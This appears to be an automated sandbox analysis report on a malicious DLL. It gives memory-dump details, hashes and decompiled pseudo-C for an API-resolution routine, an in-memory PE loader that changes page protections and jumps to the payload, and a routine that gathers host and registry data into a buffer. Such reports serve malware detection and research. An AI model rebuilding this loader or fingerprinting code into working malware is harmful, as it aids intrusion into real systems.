0x6eb31894
0x6eb3189b
0x6eb318a7
0x00000000
0x6eb318a7
0x6eb3186e
0x00000000
0x6eb3196c
0x6eb3196c
0x6eb3196d
0x6eb3197d
0x6eb31989
0x6eb31992
0x6eb3199b
0x6eb319a4
0x00000000
0x6eb319a4
0x6eb31653
0x6eb31655
0x6eb31657
0x6eb3165c
0x6eb31661
0x6eb31674
0x6eb3168a
0x6eb31693
0x6eb31694
0x6eb31694
0x6eb31696
0x6eb31697
0x6eb3169a
0x6eb3169e
0x00000000
0x6eb31657
0x6eb315f3
0x6eb315fd
0x6eb315fe
0x6eb315fe
0x6eb3160b
0x6eb31617
0x6eb31619
0x6eb3161b
0x6eb3161f
0x6eb3162f
0x6eb3162f
0x6eb31636
0x6eb31639
0x6eb3163a
0x6eb3163e
0x6eb31648
0x00000000
0x6eb31648

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973003b7ee07267e01cf882e72c36c87e2c7b4859f135ded5457ff77818404a1
Instruction ID: 844f7cade990049a3dbabe29f9250e8901195c233f877c1a122585ece4b06dc5
Opcode Fuzzy Hash: 973003b7ee07267e01cf882e72c36c87e2c7b4859f135ded5457ff77818404a1
Instruction Fuzzy Hash: 63329E705183918FC710DFA4C891AEEBBE8FF94304F248D2DE5999B261EB70D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EB26D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB26D0C() {

				 *0x6eb3d280 = GetUserNameW;
				 *0x6EB3D284 = MessageBoxW;
				 *0x6EB3D288 = GetLastError;
				 *0x6EB3D28C = CreateFileA;
				 *0x6EB3D290 = DebugBreak;
				 *0x6EB3D294 = FlushFileBuffers;
				 *0x6EB3D298 = FreeEnvironmentStringsA;
				 *0x6EB3D29C = GetConsoleOutputCP;
				 *0x6EB3D2A0 = GetEnvironmentStrings;
				 *0x6EB3D2A4 = GetLocaleInfoA;
				 *0x6EB3D2A8 = GetStartupInfoA;
				 *0x6EB3D2AC = GetStringTypeA;
				 *0x6EB3D2B0 = HeapValidate;
				 *0x6EB3D2B4 = IsBadReadPtr;
				 *0x6EB3D2B8 = LCMapStringA;
				 *0x6EB3D2BC = LoadLibraryA;
				 *0x6EB3D2C0 = OutputDebugStringA;
				return 0x6eb3d280;
			}

0x6eb26d1d
0x6eb26d25
0x6eb26d28
0x6eb26d37
0x6eb26d3a
0x6eb26d49
0x6eb26d4c
0x6eb26d5b
0x6eb26d5e
0x6eb26d6d
0x6eb26d70
0x6eb26d7f
0x6eb26d82
0x6eb26d91
0x6eb26d94
0x6eb26da3
0x6eb26da6
0x6eb26da9

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b6c79cc14362ab2137373eb47f8185849b627a2901824cc8086c9a3accaa20
Instruction ID: a7a499455031d8dfb72e1c7be7b25c27649e323ab6ec827fc3fe0ec02ad39f1c
Opcode Fuzzy Hash: 85b6c79cc14362ab2137373eb47f8185849b627a2901824cc8086c9a3accaa20
Instruction Fuzzy Hash: BF11F3B8A15B01CFCF68CF09D1968557BF1FBAE31032281AAD8098B365D734E845CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6376 Parent PID: 4700 rundll32.exeCOMMON

Executed Functions

Function 0126141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0126141B(long __ebx, void* __edi, long __esi, intOrPtr* _a4, intOrPtr _a814471233) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t141;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				intOrPtr _t186;
				unsigned int _t203;
				void* _t236;
				intOrPtr _t239;
				intOrPtr _t244;
				void* _t246;
				intOrPtr* _t250;
				intOrPtr _t258;
				DWORD* _t270;
				void* _t274;
				intOrPtr* _t277;
				intOrPtr* _t278;

				_t141 = _a4;
				_v20 = 0;
				_t246 =  *((intOrPtr*)(_t141 + 0x6c));
				 *0x1264418 = 1;
				asm("movaps xmm0, [0x1263010]");
				asm("movups [0x1264428], xmm0");
				_v48 = _t141;
				_v52 =  *((intOrPtr*)(_t141 + 0x1c));
				_v56 =  *((intOrPtr*)(_v48 + 0x54));
				_v188 = _t246;
				_v184 =  *((intOrPtr*)(_t141 + 0x38));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t246;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __esi, __ebx, _t270); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x38));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E01261E1E();
				E012622BF(_v68,  *((intOrPtr*)(_v48 + 0x3c)), _v56);
				E01261E1E( *((intOrPtr*)(_v48 + 0x3c)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t277 = _t274 - 0x8c;
				_t236 = _v68;
				_t258 =  *((intOrPtr*)(_t236 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t236;
				_v108 = _t258;
				if(_t258 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v60 != 0) {
					_v136 = 0;
					_v132 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_t203 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t203 >> 0x0000001e & 0x00000001;
						_v148 = _t203 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t174 + 0xc));
						_v184 =  *((intOrPtr*)(_v140 + 8));
						_v180 =  *((intOrPtr*)(0x1264418 + (_v144 << 4) + (_v148 << 3) + ((_t203 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v136;
						_t186 =  *_v52();
						_t277 = _t277 - 0x10;
						_t244 = _v152 + 1;
						_v156 = _t186;
						_v136 = _t244;
						_v132 = _v140 + 0x28;
						if(_t244 == _v60) {
							goto L5;
						}
						_a814471233 = _a814471233 - 1;
					}
				}
				L5:
				 *_t277 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x48));
				_t159 = DisableThreadLibraryCalls(??);
				_t278 = _t277 - 4;
				_t239 =  *_v100;
				_v120 = _t159;
				_v124 = _t239;
				_v128 = _v68;
				if(_t239 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t250 = _v48;
				_v44 =  *((intOrPtr*)(_t250 + 0x5c));
				_v40 =  *((intOrPtr*)(_t250 + 0x60));
				_v36 =  *((intOrPtr*)(_t250 + 0x64));
				_v32 =  *_t250;
				_v28 =  *((intOrPtr*)(_t250 + 0x24));
				_v24 = _v116;
				 *_t278 = _t250;
				_v188 = 0;
				_v184 = 0x70;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x70;
				_v172 =  *((intOrPtr*)(_v128 + 0x28));
				E01261E1E();
				if(_v172 != 0) {
					_t277 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x01261427
0x01261435
0x0126143c
0x0126143f
0x01261449
0x01261450
0x0126145a
0x01261460
0x01261469
0x01261472
0x01261475
0x01261479
0x01261481
0x01261488
0x0126148b
0x0126148e
0x01261491
0x01261494
0x012614ae
0x012614b4
0x012614b7
0x012614bf
0x012614c3
0x012614c6
0x012614c9
0x012614cc
0x012614cf
0x012614eb
0x01261508
0x0126152d
0x0126152f
0x01261538
0x0126153b
0x01261545
0x01261548
0x0126154b
0x0126154e
0x01261551
0x01261568
0x01261568
0x01261574
0x01261577
0x0126174d
0x01261753
0x012615f2
0x012615f2
0x0126160a
0x0126160d
0x0126161b
0x0126162c
0x01261658
0x0126165b
0x0126165f
0x01261663
0x0126166a
0x01261670
0x01261672
0x01261684
0x0126168c
0x01261692
0x01261698
0x0126169b
0x00000000
0x00000000
0x012616a5
0x012616a5
0x012615f2
0x01261599
0x012615a7
0x012615af
0x012615b2
0x012615b4
0x012615ba
0x012615c6
0x012615c9
0x012615cc
0x012615cf
0x012615ea
0x012615ea
0x012616d5
0x012616db
0x012616e1
0x012616e7
0x012616ec
0x012616f2
0x012616f8
0x012616fb
0x012616fe
0x01261706
0x0126170e
0x01261714
0x0126171a
0x01261720
0x01261726
0x01261734
0x0126158c
0x01261592
0x01261592
0x012616bf

APIs

VirtualProtect.KERNELBASE ref: 01261494
VirtualProtect.KERNELBASE ref: 0126152D

Strings

p, xrefs: 01261706

Memory Dump Source

Source File: 00000002.00000002.320914247.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: p
API String ID: 544645111-2181537457
Opcode ID: 94ef015e7a1c53a3b5076298ae5a5609b49bb724752f2a9a4284905bede0245b
Instruction ID: 10e06672dd995e022a224b1302cc32f602669f90914212ad2d248450cc32ad0c
Opcode Fuzzy Hash: 94ef015e7a1c53a3b5076298ae5a5609b49bb724752f2a9a4284905bede0245b
Instruction Fuzzy Hash: F581ACB4E142198FDB14DF99C480AADFBF1FF88300F15806AE959AB391D334A891CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6EB24D50, Relevance: 3.2, Strings: 2, Instructions: 650
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EB24D50(intOrPtr __ecx, intOrPtr __edx) {
				void* __esi;
				void* _t241;
				void* _t242;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t261;
				void* _t265;
				intOrPtr _t274;
				intOrPtr* _t276;
				signed short* _t297;
				signed int _t298;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t334;
				intOrPtr _t336;
				void* _t339;
				signed int _t347;
				void* _t349;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				void* _t366;
				signed int _t371;
				signed int _t373;
				signed int _t375;
				void* _t380;
				signed int _t385;
				signed int _t389;
				void* _t391;
				void* _t392;
				void* _t393;
				signed int* _t395;
				signed short* _t397;
				signed int _t438;
				void* _t557;
				void* _t580;
				signed int _t585;
				signed int _t586;
				signed int _t588;
				void* _t589;
				void* _t590;
				intOrPtr _t601;
				signed int _t603;
				signed int _t604;
				void* _t607;
				signed int _t617;
				void* _t621;

				_t601 = __edx;
				 *((intOrPtr*)(_t621 + 0xb0)) = __ecx;
				_t395 = E6EB30730(0);
				 *((intOrPtr*)(_t621 + 0x10)) = E6EB25708();
				_t607 = 0x10;
				_t557 =  !=  ? _t607 : _t395[3] & 0x000000ff;
				_t589 = 0x20;
				_t590 =  !=  ? 0 : _t589;
				_t8 = _t557 + _t590 + 0x40; // 0x50
				_t609 =  !=  ? _t8 : _t557 + _t590;
				_t625 = _t395[9] - 1;
				_t560 =  <=  ? 0 : 0x80;
				_t610 = ( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80);
				_t611 = ( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff;
				_t612 = (( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff) << 8;
				_t613 = (( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff) << 0x00000008 | _t395[1] << 0x00000010;
				_t614 = (( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff) << 0x00000008 | _t395[1] << 0x00000010 |  *_t395;
				E6EB2DF4C(_t621 + 0x6c, 0);
				E6EB2F584(_t621 + 4, 0);
				E6EB2BF28(_t621 + 0x4c);
				E6EB2DFC0(_t621 + 0x6c,  *((intOrPtr*)(_t621 + 0x4c)));
				E6EB2DFA4(_t621 + 0x4c);
				 *((char*)(_t621 + 0x10c)) = E6EB2E8A8( *((intOrPtr*)(_t621 + 0x68)), 0x7fffffff);
				E6EB2F4DC(_t621 + 8, _t395[9] - 1, _t621 + 0x10c, 1);
				E6EB2F4DC(_t621 + 8, _t395[9] - 1,  *((intOrPtr*)(_t621 + 0x68)), E6EB2E8A8( *((intOrPtr*)(_t621 + 0x68)), 0x7fffffff));
				E6EB2BF70(_t621 + 0xdc);
				E6EB2F89C(_t621 + 0xe0, _t621 + 0x50, 0);
				E6EB2E06C(_t621 + 0x50, _t621 + 0x124);
				E6EB2DFC0(_t621 + 0x6c,  *((intOrPtr*)(_t621 + 0x124)));
				E6EB2DFA4(_t621 + 0x124);
				E6EB2DFA4(_t621 + 0x4c);
				E6EB2F654(_t621 + 0xdc);
				E6EB2F4DC(_t621 + 8, _t395[9] - 1,  *((intOrPtr*)(_t621 + 0x68)), E6EB2E8A8( *((intOrPtr*)(_t621 + 0x68)), 0x7fffffff));
				 *((short*)(_t621 + 0x114)) = E6EB3360C( *((intOrPtr*)( *((intOrPtr*)(_t621 + 0x10)))));
				E6EB2F4DC(_t621 + 8, _t395[9] - 1, _t621 + 0x114, 2);
				_t425 = (( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff) << 0x00000008 | _t395[1] << 0x00000010 |  *_t395;
				 *((intOrPtr*)(_t621 + 0x11c)) = E6EB33614((( !=  ? _t8 : _t557 + _t590) + ( <=  ? 0 : 0x80) | _t395[2] & 0x000000ff) << 0x00000008 | _t395[1] << 0x00000010 |  *_t395);
				E6EB2F4DC(_t621 + 8, _t625, _t621 + 0x11c, 4);
				 *((intOrPtr*)(_t621 + 0x120)) = _t601;
				E6EB2F4DC(_t621 + 8, _t625, _t621 + 0x120, 4);
				 *((char*)(_t621 + 0x110)) =  *((intOrPtr*)(_t621 + 0x180));
				E6EB2F4DC(_t621 + 8, _t625, _t621 + 0x110, 1);
				if( *0x6eb3d260 == 0) {
					 *0x6eb3d260 = 1;
					E6EB2DF4C(_t621 + 0xc0, 0);
					_push(0x2e);
					_t241 = E6EB2EB84(_t621 + 0xc0);
					_push(0x4b);
					_t242 = E6EB2EB84(_t241);
					_push(0x42);
					E6EB2EB84(_t242);
					E6EB2CF84(_t621 + 0xd0, 0);
					_push(0x20);
					_t245 = E6EB2DEE8(_t621 + 0xd0);
					_push(0x28);
					_t246 = E6EB2DEE8(_t245);
					_push(0x4b);
					_t247 = E6EB2DEE8(_t246);
					_push(0x42);
					E6EB2DEE8(_t247);
					_t438 = 5;
					memcpy(_t621 + 0x24, 0x6eb3ae80, _t438 << 2);
					_t621 = _t621 + 0xc;
					 *((intOrPtr*)(_t621 + 0x10)) = 0;
					E6EB2F584(_t621 + 0x18, 0);
					_t603 = 0;
					__eflags = 0;
					goto L3;
					do {
						L5:
						_t259 = _t621 + 0x10;
						_push(0);
						_t84 = _t259 + 0x28; // 0x28
						E6EB35580(_t84, _t621 + 0x10, 0x80000002);
						_t261 = _t621 + 0x8c;
						_push(_t261);
						_t86 = _t261 - 0x54; // 0x7fffffae
						E6EB35AA8(_t86);
						E6EB2CF84(_t621 + 0x58, 0);
						E6EB2CF84(_t621 + 0x9c, 0);
						__eflags =  *(_t621 + 0x8c);
						if( *(_t621 + 0x8c) <= 0) {
							L10:
							__eflags = _t395[2] - 0x28;
							if(_t395[2] >= 0x28) {
								_t265 = E6EB2F4CC(_t621 + 0x14);
								_t102 = _t265 + 4; // 0x4
								E6EB2F828(_t621 + 0x18, _t102);
								_t617 = _t265 + 0xfffffffc;
								__eflags = _t617;
								if(_t617 > 0) {
									_t349 = E6EB2F4BC(_t621 + 0x18, 8);
									E6EB338F0(_t349, E6EB2F4BC(_t621 + 0x18, 4), _t617);
									_t621 = _t621 + 0xc;
								}
								 *((intOrPtr*)(E6EB2F4BC(_t621 + 0x18, 4))) = 0xe68a766;
								 *((intOrPtr*)(_t621 + 0x10)) =  *((intOrPtr*)(_t621 + 0x10)) + 1;
								E6EB2CFDC(_t621 + 0x98);
								E6EB2CFDC(_t621 + 0x54);
								L6EB2EBFC(_t621 + 0x8c);
								E6EB2CFDC(_t621 + 0x44);
								__eflags =  *((char*)(_t621 + 0x40));
								if( *((char*)(_t621 + 0x40)) == 0) {
									goto L28;
								} else {
									_t588 =  *(_t621 + 0x3c);
									__eflags = _t588;
									if(_t588 == 0) {
										L24:
										_t347 = 1;
										L26:
										__eflags = _t347;
										if(_t347 == 0) {
											E6EB35558(_t588);
										}
										goto L28;
									}
									__eflags = _t588 - 0xffffffff;
									if(_t588 != 0xffffffff) {
										_t347 = 0;
										__eflags = 0;
										goto L26;
									}
									goto L24;
								}
							}
							E6EB2CFDC(_t621 + 0x98);
							E6EB2CFDC(_t621 + 0x54);
							L6EB2EBFC(_t621 + 0x8c);
							E6EB2CFDC(_t621 + 0x44);
							__eflags =  *((char*)(_t621 + 0x40));
							if( *((char*)(_t621 + 0x40)) == 0) {
								L18:
								 *(_t621 + 0x3c) = 0;
								break;
							}
							_t585 =  *(_t621 + 0x3c);
							__eflags = _t585;
							if(_t585 == 0) {
								L14:
								_t356 = 1;
								L16:
								__eflags = _t356;
								if(_t356 == 0) {
									E6EB35558(_t585);
								}
								goto L18;
							}
							__eflags = _t585 - 0xffffffff;
							if(_t585 != 0xffffffff) {
								_t356 = 0;
								__eflags = 0;
								goto L16;
							}
							goto L14;
						} else {
							_t604 = 0;
							__eflags = 0;
							do {
								_t620 = E6EB2EC3C(_t621 + 0x90, _t604);
								_t359 = E6EB2E01C(_t358);
								__eflags = _t359;
								if(_t359 != 0) {
									goto L9;
								}
								_t360 = E6EB2E0A8(_t620,  *((intOrPtr*)(_t621 + 0xbc)));
								__eflags = _t360;
								if(_t360 == 0) {
									_push( *(_t621 + 0x3c));
									E6EB3512C(_t621 + 0x30, _t604,  *_t620, 0);
									E6EB355B0(_t621 + 0x2c, _t621 + 0x15c, 0x237f1eba);
									_t363 = _t621 + 0xa0;
									_push( *((intOrPtr*)(_t621 + 0x15c)));
									_t171 = _t363 - 0x7c; // -124
									E6EB358B4(_t171, __eflags, _t621 + 0xa0);
									E6EB2DFA4(_t621 + 0x15c);
									_t366 = _t621 + 0xa8;
									_push(_t366);
									_t173 = _t366 - 8; // -8
									E6EB2F1DC(_t173);
									E6EB2CFF8(_t621 + 0x58,  *((intOrPtr*)(_t621 + 0xa8)));
									E6EB2CFDC(_t621 + 0xa8);
									E6EB2CFDC(_t621 + 0xa0);
									_t371 = E6EB2D130(_t621 + 0x54);
									__eflags = _t371;
									if(_t371 == 0) {
										_t375 = E6EB2D1BC(_t621 + 0x58,  *((intOrPtr*)(_t621 + 0xcc)));
										__eflags = _t375;
										if(_t375 == 0) {
											E6EB355B0(_t621 + 0x2c, _t621 + 0x164, 0x95948db7);
											_push( *((intOrPtr*)(_t621 + 0x164)));
											E6EB358B4(_t621 + 0xa4 - 0x7c, __eflags, _t621 + 0xa4);
											E6EB2DFA4(_t621 + 0x164);
											_t380 = _t621 + 0xa8;
											_push(_t380);
											_t187 = _t380 - 8; // -8
											E6EB2F1DC(_t187);
											E6EB2CFF8(_t621 + 0x9c,  *((intOrPtr*)(_t621 + 0xa8)));
											E6EB2CFDC(_t621 + 0xa8);
											E6EB2CFDC(_t621 + 0xa0);
											_t385 = E6EB2D130(_t621 + 0x98);
											__eflags = _t385;
											if(_t385 == 0) {
												_push(0x20);
												_t391 = E6EB2DEE8(_t621 + 0x58);
												_push(0x28);
												_t392 = E6EB2DEE8(_t391);
												_push(0);
												_push( *((intOrPtr*)(_t621 + 0x9c)));
												_t393 = E6EB2F07C(_t392);
												_push(0x29);
												E6EB2DEE8(_t393);
											}
											E6EB2DCB8(_t621 + 0x104);
											E6EB2DFC0(_t620,  *((intOrPtr*)(_t621 + 0x104)));
											E6EB2DFA4(_t621 + 0x104);
											_t389 = E6EB2F008( *_t620);
											__eflags = _t389;
											if(_t389 == 0) {
												_t201 = _t621 + 0x64; // 0x42
												E6EB2E644(_t201,  *_t620,  *((intOrPtr*)(_t621 + 0x5c)));
											}
										}
									}
									E6EB2CFDC(_t621 + 0x30);
									__eflags =  *((char*)(_t621 + 0x2c));
									if( *((char*)(_t621 + 0x2c)) == 0) {
										L50:
										 *(_t621 + 0x28) = 0;
										goto L9;
									} else {
										_t586 =  *(_t621 + 0x28);
										__eflags = _t586;
										if(_t586 == 0) {
											L46:
											_t373 = 1;
											L48:
											__eflags = _t373;
											if(_t373 == 0) {
												E6EB35558(_t586);
											}
											goto L50;
										}
										__eflags = _t586 - 0xffffffff;
										if(_t586 != 0xffffffff) {
											_t373 = 0;
											__eflags = 0;
											goto L48;
										}
										goto L46;
									}
								}
								L9:
								_t604 = _t604 + 1;
								__eflags = _t604 -  *(_t621 + 0x8c);
							} while (_t604 <  *(_t621 + 0x8c));
							goto L10;
						}
						L28:
						_t274 =  *((intOrPtr*)(_t621 + 0x70)) + 1;
						 *(_t621 + 0x3c) = 0;
						 *((intOrPtr*)(_t621 + 0x70)) = _t274;
						__eflags = _t274 - 2;
					} while (_t274 < 2);
					E6EB2788C(_t621 + 0xc4, 0);
					_t276 =  *0x6eb3d1c8; // 0xb231a5fd
					E6EB2DCE0(_t621 + 0xf4);
					_push(0);
					_push( *((intOrPtr*)(_t621 + 0xf8)));
					E6EB2ED3C(_t621 + 0xcc);
					E6EB2DFA4(_t621 + 0xf4);
					E6EB2EDDC(E6EB2E644(E6EB2F020(_t621 + 0x5c),  *((intOrPtr*)(_t621 + 0xc8)),  *_t280),  *_t276, _t621 + 0xfc, 0x3b);
					 *((intOrPtr*)(_t621 + 0x12c)) = E6EB33614(E6EB2E8A8( *((intOrPtr*)(_t621 + 0xfc)), 0x7fffffff));
					E6EB2F4DC(_t621 + 8, __eflags, _t621 + 0x12c, 4);
					_t575 = 0x7fffffff;
					E6EB2F4DC(_t621 + 8, __eflags,  *((intOrPtr*)(_t621 + 0xfc)), E6EB2E8A8( *((intOrPtr*)(_t621 + 0xfc)), 0x7fffffff));
					E6EB2DFA4(_t621 + 0xfc);
					E6EB2DFA4(_t621 + 0xc4);
					L6EB2EBFC(_t621 + 0x5c);
					E6EB2DF4C(_t621 + 0xb8, 0);
					E6EB2DF4C(_t621 + 0x138, 0);
					E6EB2DF4C(_t621 + 0x140, 0);
					E6EB2F584(_t621 + 0x150, 0);
					 *((intOrPtr*)(_t621 + 0x70)) = 0;
					 *((intOrPtr*)(_t621 + 0x74)) = 0;
					 *((intOrPtr*)(_t621 + 0x78)) = 0;
					_t297 = E6EB33064(0x8e844d1e, 0x25841de9);
					__eflags = _t297;
					if(_t297 == 0) {
						_t397 = 0;
					} else {
						asm("int3");
						asm("int3");
						_t397 = _t297;
					}
					while(1) {
						_t298 =  *_t397 & 0x0000ffff;
						__eflags = _t298;
						if(_t298 == 0) {
							break;
						}
						__eflags = _t298 - 0x3d;
						if(_t298 != 0x3d) {
							E6EB2DCE0(_t621 + 0xec);
							_t143 = _t621 + 0x78; // 0x42
							E6EB2E644(_t143,  *((intOrPtr*)(_t621 + 0xf0)),  *((intOrPtr*)(_t621 + 0x70)));
							E6EB2DFA4(_t621 + 0xec);
						}
						_t575 = 0x7fffffff;
						_t397 = _t397 + 2 + E6EB2DD8C(_t397, 0x7fffffff) * 2;
					}
					E6EB2EDDC(E6EB2F020(E6EB2EE7C(_t621 + 0x70)), _t575, _t621 + 0x144, 0xa);
					_push(0);
					_push( *((intOrPtr*)(_t621 + 0x148)));
					E6EB2ED3C(_t621 + 0xbc);
					E6EB2DFA4(_t621 + 0x144);
					L6EB2EBFC(_t621 + 0x70);
					 *((intOrPtr*)(_t621 + 0x130)) = E6EB33614(E6EB2E8A8( *((intOrPtr*)(_t621 + 0xb4)), 0x7fffffff));
					E6EB2F4DC(_t621 + 8, __eflags, _t621 + 0x130, 4);
					E6EB2F4DC(_t621 + 8, __eflags,  *((intOrPtr*)(_t621 + 0xb4)), E6EB2E8A8( *((intOrPtr*)(_t621 + 0xb4)), 0x7fffffff));
					E6EB2F654(_t621 + 0x14c);
					E6EB2DFA4(_t621 + 0x13c);
					E6EB2DFA4(_t621 + 0x134);
					E6EB2DFA4(_t621 + 0xb4);
					E6EB2F654(_t621 + 0x14);
					E6EB2CFDC(_t621 + 0xcc);
					E6EB2DFA4(_t621 + 0xbc); // executed
					goto L1;
					L3:
					E6EB2F828(_t621 + 0x18, E6EB2F4CC(_t621 + 0x14) + 4);
					 *((intOrPtr*)(E6EB2F4BC(_t621 + 0x18, E6EB2F4CC(_t621 + 0x14) + 0xfffffffc))) =  *((intOrPtr*)(_t621 + 0x24 + _t603 * 4));
					_t603 = _t603 + 1;
					 *((intOrPtr*)(_t621 + 0x10)) =  *((intOrPtr*)(_t621 + 0x10)) + 1;
					__eflags = _t603 - 5;
					if(_t603 < 5) {
						goto L3;
					} else {
						__eflags = 0;
						 *((intOrPtr*)(_t621 + 0x70)) = 0;
						 *((intOrPtr*)(_t621 + 0x5c)) = 0;
						 *((intOrPtr*)(_t621 + 0x60)) = 0;
						 *((intOrPtr*)(_t621 + 0x64)) = 0;
						goto L5;
					}
				}
				L1:
				_t580 = 2;
				E6EB2788C(_t621 + 0x4c, _t580);
				_push(0x3b);
				E6EB2E1C4(_t621 + 0x54, _t621 + 0xd4);
				E6EB2DFA4(_t621 + 0x4c);
				E6EB2F584(_t621 + 0x80, E6EB2F4CC(_t621));
				_t328 = E6EB2E8A8( *((intOrPtr*)(_t621 + 0xd4)), 0x7fffffff);
				_t329 = E6EB2F4BC(_t621 + 4, 0);
				_t330 = E6EB2F4CC(_t621);
				_t331 = E6EB2F4BC(_t621 + 0x80, 0);
				_push(0);
				_push(0);
				_push(_t331);
				_push(_t330);
				_push(_t329);
				E6EB34B38( *((intOrPtr*)(_t621 + 0xd4)), _t328);
				_t334 = E6EB2F9DC(_t621 + 0x7c);
				E6EB2F584( *((intOrPtr*)(_t621 + 0xb4)), 0);
				_t336 = E6EB33614(_t334);
				_t584 = _t621 + 0x118;
				 *((intOrPtr*)(_t621 + 0x118)) = _t336;
				E6EB2F4DC( *((intOrPtr*)(_t584 - 0x68)), 0, _t584, 4);
				_t339 = E6EB2F4BC(_t621 + 0x80, 0);
				E6EB2F4DC( *((intOrPtr*)(_t621 + 0xb8)), 0, _t339, E6EB2F4CC(_t621 + 0x7c));
				E6EB2F654(_t621 + 0x7c);
				E6EB2DFA4(_t621 + 0xd4);
				E6EB2F654(_t621);
				E6EB2DFA4(_t621 + 0x68);
				return  *((intOrPtr*)(_t621 + 0xb0));
			}

0x6eb24d5a
0x6eb24d5c
0x6eb24d6a
0x6eb24d71
0x6eb24d7b
0x6eb24d7e
0x6eb24d85
0x6eb24d8b
0x6eb24d99
0x6eb24da0
0x6eb24da8
0x6eb24dac
0x6eb24daf
0x6eb24db1
0x6eb24db6
0x6eb24dbc
0x6eb24dbe
0x6eb24dc0
0x6eb24dcb
0x6eb24dd6
0x6eb24de3
0x6eb24dec
0x6eb24e06
0x6eb24e11
0x6eb24e2c
0x6eb24e38
0x6eb24e4a
0x6eb24e5b
0x6eb24e6b
0x6eb24e72
0x6eb24e7b
0x6eb24e87
0x6eb24ea2
0x6eb24eb9
0x6eb24ec5
0x6eb24eca
0x6eb24ed8
0x6eb24ee3
0x6eb24eef
0x6eb24efa
0x6eb24f0d
0x6eb24f16
0x6eb24f22
0x6eb2504a
0x6eb25058
0x6eb2505d
0x6eb25066
0x6eb2506d
0x6eb2506f
0x6eb25076
0x6eb25078
0x6eb25086
0x6eb2508b
0x6eb25094
0x6eb2509b
0x6eb2509d
0x6eb250a4
0x6eb250a6
0x6eb250ad
0x6eb250af
0x6eb250bf
0x6eb250c0
0x6eb250c0
0x6eb250c4
0x6eb250cd
0x6eb250d2
0x6eb250d2
0x6eb250d2
0x6eb25122
0x6eb25122
0x6eb25122
0x6eb25126
0x6eb2512e
0x6eb25131
0x6eb25136
0x6eb2513d
0x6eb2513e
0x6eb25141
